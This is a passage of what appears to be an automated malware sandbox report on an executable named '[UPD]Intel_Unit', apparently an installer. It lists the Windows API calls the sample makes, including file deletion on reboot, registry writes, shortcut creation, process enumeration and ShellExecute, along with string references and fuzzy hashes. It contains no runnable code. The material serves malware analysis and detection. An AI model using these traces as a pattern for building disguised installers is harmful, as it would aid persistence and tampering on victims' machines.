                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                                                                                                                              • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                              • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                              • API String ID: 1916479912-1189179171
                                                                                                                                                                                                              • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                                              • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                                                                                                                              • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                                                                                                                              • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                                                                                                                              • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                                                                                                                              • \*.*, xrefs: 00406D03
                                                                                                                                                                                                              • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                                                                                                                              • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                                                                                                                              • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                                                                                                                              • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                              • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                                                                                                                              • API String ID: 2035342205-3294556389
                                                                                                                                                                                                              • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                                              • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                                              • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                              • API String ID: 542301482-1377821865
                                                                                                                                                                                                              • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                                                                                              • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                                                                              • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                                                                                              • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                                                                                                                                • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                              • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                              • API String ID: 20674999-2124804629
                                                                                                                                                                                                              • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                                                              • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 004041AF
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                                                                                                                                                • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                                                                                                                                                • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                                                                                                                                                • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                                                                                                                                              • SendMessageW.USER32(00000000), ref: 00404251
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004042D2
                                                                                                                                                                                                              • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004042F6
                                                                                                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                              • String ID: @%F$N$open
                                                                                                                                                                                                              • API String ID: 3928313111-3849437375
                                                                                                                                                                                                              • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                                              • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                                                                                                                                • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                                                • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00406B4D
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                                                                                                                                • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                              • String ID: F$%s=%s$NUL$[Rename]
                                                                                                                                                                                                              • API String ID: 565278875-1653569448
                                                                                                                                                                                                              • Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                                                                                                                                              • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                              • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                              • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                              • String ID: F
                                                                                                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                                                                                                              • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                                              • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                              • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
